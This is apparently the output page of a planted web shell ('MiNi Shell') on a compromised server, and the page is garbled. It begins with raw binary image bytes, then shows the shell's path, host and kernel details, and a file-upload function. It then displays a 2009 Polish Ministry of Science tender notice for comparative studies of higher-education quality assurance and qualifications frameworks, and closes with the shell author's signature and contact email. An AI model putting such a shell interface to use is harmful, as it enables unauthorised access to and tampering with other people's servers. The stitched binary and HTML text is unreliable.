JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090729/258856-N-2009.html

<p class="kh_header"><b>Warszawa: Opracowanie analiz opisujących systemy zapewnienia jakości kształcenia oraz Krajowe Ramy Kwalifikacji w europejskim obszarze szkolnictwa wyższego</b><br>
<b>Numer ogłoszenia: 258856 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnisw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.bip.nauka.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie analiz opisujących systemy zapewnienia jakości kształcenia oraz Krajowe Ramy Kwalifikacji w europejskim obszarze szkolnictwa wyższego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I przedmiotu zamówienia.
Analiza porównawcza ustawodawstwa dotyczącego przygotowania i wprowadzenia zaawansowanego i wszechstronnego systemu zapewnienia jakości kształcenia w Austrii, Niemczech, Danii, Finlandii, Irlandii, Szwecji, Norwegii mająca na celu syntezę problemów, które państwa te musiały pokonać przy projektowaniu i wprowadzaniu systemu zapewnienia jakości jak i przedstawienie rozwiązań prawnych, które zastosowały.  W krajach, które wdrożyły Krajowe Ramy Kwalifikacji, należy szczególnie uwzględnić sytuację po ich  wdrożeniu.
Część II przedmiotu zamówienia.
Analiza porównawcza problemów związanych z przygotowaniem do wprowadzenia i wdrażania Krajowych Struktur (Ram) Kwalifikacji oraz przyjętych rozwiązań prawnych we Francji, Irlandii, Niemczech oraz w Wielkiej Brytanii.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy Pzp, tj.: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
UWAGA 	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w pkt 1-3 musi spełniać przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.

UWAGA 	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może podlegać wykluczeniu z postępowania.

2. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa w ust. 1 pkt  2), Wykonawca musi wykazać, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tzn. należycie wykonał:

CZĘŚĆ I PRZEDMIOTU ZAMÓWIENIA
(W przypadku Wykonawców występujących wspólnie niżej postawione warunki musi  spełniać przynajmniej jeden z Wykonawców).
1) co najmniej dwie usługi o wartości nie mniejszej niż 50.000 zł (słownie złotych: pięćdziesiąt tysięcy) brutto każda, dotyczących przeprowadzenia badań w zakresie analiz prawnych i/lub ekonomicznych i/lub społecznych;
2) co najmniej dwie usługi w zakresie badań ilościowych (wywiad kwestionariuszowy) minimum na próbie 150.
3) Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia tj.:
a) osobą koordynującą realizację badania, która posiada:
- znajomość zasad funkcjonowania szkolnictwa wyższego,
- znajomość problematyki dotyczącej jakości kształcenia 
- co najmniej trzyletnie doświadczenie w zakresie kierowania badaniami w obszarze szkolnictwa wyższego,
- doświadczenie w stosowaniu jakościowych i ilościowych metod badań oraz oceny rozwiązań prawnych;
b) zespołem badawczym składającym się z osób, które posiadają doświadczenie w zakresie: 
- badań nad szkolnictwem wyższym oraz znajomość przepisów prawa obowiązujących w obszarze szkolnictwa wyższego,
- problematyki jakości kształcenia,
- prowadzenia badań ekonomicznych i/lub społecznych i/lub analiz prawnych,
- stosowania metod i technik realizowania badań ekonomicznych i/lub społecznych i /lub prawnych,
- prowadzenia badań ilościowych.

CZĘŚĆ II PRZEDMIOTU ZAMÓWIENIA 
(W przypadku Wykonawców występujących wspólnie niżej postawione warunki musi  spełniać przynajmniej jeden z Wykonawców).
1) co najmniej dwie usługi o wartości nie mniejszej niż 30.000 zł (słownie złotych: trzydzieści tysięcy) brutto każda, dotyczących przeprowadzenia badań w zakresie analiz prawnych i/lub ekonomicznych i/lub społecznych;
2) co najmniej dwie usługi w zakresie badań ilościowych (wywiad kwestionariuszowy) minimum na próbie 150.
3) Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia tj.:
a) osobą koordynującą realizację badania, która posiada:
- znajomość zasad funkcjonowania szkolnictwa wyższego,
- znajomość problematyki związanej z tworzeniem i funkcjonowaniem Krajowych Ram Kwalifikacji,
- co najmniej trzyletnie doświadczenie w zakresie kierowania badaniami 
w obszarze szkolnictwa wyższego,
- doświadczenie w stosowaniu jakościowych i ilościowych metod badań oraz oceny rozwiązań prawnych;
b) zespołem badawczym składającym się z osób, które posiadają doświadczenie w zakresie: 
- badań nad szkolnictwem wyższym oraz znajomość przepisów prawa obowiązujących w obszarze szkolnictwa wyższego,
- problematyki jakości kształcenia oraz Krajowych Ram Kwalifikacji,
- prowadzenia badań ekonomicznych i/lub społecznych i/lub analiz prawnych,
- stosowania metod i technik realizowania badań ekonomicznych i/lub społecznych i /lub prawnych,
- prowadzenia badań ilościowych.
3. Ocena spełniania przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych przez Wykonawcę. Z treści załączonych do oferty dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia warunki określone przez Zamawiającego w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 1-3 ustawy Pzp (wzór stanowi Załącznik Nr 3 do SIWZ).
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 4 ustawy Pzp (wzór stanowi Załącznik Nr 4 do SIWZ).
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa RM z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605, z późn. zm.) tj. składa dokument - dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument zawierający ww. oświadczenie powinien zostać sporządzony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
4. Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wzór dla części I przedmiotu zamówienia stanowi Załącznik Nr 5 do SIWZ - wzór dla części II przedmiotu zamówienia stanowi Załącznik Nr 7 do SIWZ) oraz dokumenty potwierdzające, że te usługi zostały wykonanie należycie np. protokoły odbioru, referencje wystawione przez Zamawiającego (podmiot, który zlecał wykonanie usługi).
5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  (wzór dla części I przedmiotu zamówienia stanowi Załącznik Nr 6 do SIWZ - wzór dla części II przedmiotu zamówienia stanowi Załącznik Nr 8 do SIWZ).
UWAGA  	Zmiana osób wymienionych w wykazie osób w toku realizacji umowy będzie dopuszczalna pod warunkiem wyrażenia przez Zamawiającego zgody na piśmie. Zaproponowane osoby muszą spełniać co najmniej wymagania określone w niniejszej SIWZ.
6. Inne np.: 
1) pełnomocnictwo do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynika z przepisów prawa lub innych dokumentów,
2) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ust. 5, Wykonawca wykazał osoby, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Metodologia i sposób realizacji badania - 50</li>
<li>3 - Ocena ryzyka podczas realizacji badania - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.nauka.gov.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Nauki i Szkolnictwa Wyższego,
ul. Współna 1/3,
00-529 Warszawa,
Wydział Zamówień Publicznych, pokój 38.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2009 godzina 14:00, miejsce: Ministerstwo Nauki i Szkolnictwa Wyższego,
ul. Współna 1/3,
00-529 Warszawa,
(wejście od ul. Hożej 20),
Wydział Zamówień Publicznych, pokój 38.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013
2. OFERTY CZĘŚCIOWE
1) Zamawiający dopuszcza składanie ofert częściowych na dowolnie wybraną część przedmiotu zamówienia (część I, część II).
2) Zamawiający będzie oceniał oferty dla każdej części przedmiotu zamówienia osobno.
3) W przypadku wystąpienia okoliczności prowadzących do unieważnienia postępowania Zamawiający unieważni postępowanie tylko w danej części.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Analiza porównawcza ustawodawstwa dotyczącego przygotowania i wprowadzenia zaawansowanego i wszechstronnego systemu zapewnienia jakości kształcenia w Austrii, Niemczech, Danii, Finlandii, Irlandii, Szwecji, Norwegii mająca na celu syntezę problemów, które państwa te musiały pokonać przy projektowaniu i wprowadzaniu systemu zapewnienia jakości jak i przedstawienie rozwiązań prawnych, które zastosowały.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza porównawcza ustawodawstwa dotyczącego przygotowania i wprowadzenia zaawansowanego i wszechstronnego systemu zapewnienia jakości kształcenia w Austrii, Niemczech, Danii, Finlandii, Irlandii, Szwecji, Norwegii mająca na celu syntezę problemów, które państwa te musiały pokonać przy projektowaniu i wprowadzaniu systemu zapewnienia jakości jak i przedstawienie rozwiązań prawnych, które zastosowały.  W krajach, które wdrożyły Krajowe Ramy Kwalifikacji, należy szczególnie uwzględnić sytuację po ich  wdrożeniu.
1.	Cel i zakres przedmiotu analizy.
Głównym celem analizy jest zapoznanie się z rozwiązaniami przyjętymi w wybranych krajach europejskich w zakresie budowania i wdrażania systemu zapewniania jakości kształcenia w szkolnictwie wyższym. Analiza ta pozwoli na określenie zakresu prac i problemów, które są kluczowe dla wzajemnej uznawalności decyzji akredytacyjnych. Ponadto umożliwi zapoznanie się z przykładami rozwiązań zastosowanych w tych krajach EU, które już wdrożyły system zapewnienia jakości uwzględniający Krajowe Ramy Kwalifikacji oraz ze szczególnymi problemami, które występują przy stosowaniu systemu zapewniania jakości oraz pozwoli na skorzystanie z rozwiązań przyjętych w innych krajach. Oczekuje się m.in. informacji dotyczących stosowanych systemów wewnętrznej oceny jakości kształcenia w szkołach wyższych oraz ich powiązania z efektami kształcenia.
Analiza ta ma także na celu wsparcie prac studyjnych w zakresie dostosowania krajowego prawodawstwa do procesu włączania polskiego szkolnictwa do Europejskiego Obszaru Szkolnictwa Wyższego. 
2.	Zakres terytorialny.
Badanie dotyczy Austrii, Niemczech, Danii, Finlandii, Irlandii, Szwecji, Norwegii.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 84.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Metodologia i sposób realizacji badania - 50</li>
<li>3. Ocena ryzyka podczas realizacji badania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Analiza porównawcza problemów związanych z przygotowaniem do wprowadzenia i wdrażania Krajowych Struktur (Ram) Kwalifikacji oraz przyjętych rozwiązań prawnych we Francji, Irlandii, Niemczech oraz w Wielkiej Brytanii..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza porównawcza problemów związanych z przygotowaniem do wprowadzenia i wdrażania Krajowych Struktur (Ram) Kwalifikacji oraz przyjętych rozwiązań prawnych we Francji, Irlandii, Niemczech oraz w Wielkiej Brytanii. 
1.	Cel i zakres przedmiotu analizy.
Analiza ma na celu identyfikację problemów, które w/w państwa napotkały w procesie projektowania i wdrażania Krajowych Struktur (Ram) Kwalifikacji oraz metod i środków zastosowanych w celu pokonania tych przeszkód. Ponadto analiza powinna przedstawić rozwiązania prawne zastosowane w poszczególnych krajach wraz z opisem możliwości i celowości zastosowania ich w Polsce, oraz zestawienie dobrych praktyk dotyczących przeprowadzania procesu oraz sposobów opisywania programów kształcenia poprzez ich efekty (pokazanie przykładów opisów efektów kształcenia, poradników wdrażania etc.).
Analiza będzie stanowiła bezpośrednie wsparcie prac studyjnych poprzez przygotowanie materiałów pomocniczych dla zmian polskiego prawodawstwa w związku z procesem włączania się polskiego szkolnictwa do Europejskiego Obszaru Szkolnictwa Wyższego.
Analiza będzie stanowiła wsparcie dla prac MNiSW w rozwiązywaniu problemów i podejmowaniu decyzji w procesie opracowania i implementacji Krajowych Struktur (Ram) Kwalifikacji.
2.	Zakres przedmiotowy analizy.
Analizą należy objąć problemy organizacyjne i merytoryczne oraz przyjęte rozwiązania prawne związane z tworzeniem i implementacją Krajowych Struktur (Ram) Kwalifikacji.
3.	Zakres terytorialny.
Analizą należy objąć następujące państwa: Francja, Irlandia, Niemcy, Wielka Brytania.
Powyższe kraje wdrożyły Krajowe Struktury (Ramy) Kwalifikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Metodologia i sposób realizacji badania - 50</li>
<li>3. Ocena ryzyka podczas realizacji badania - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com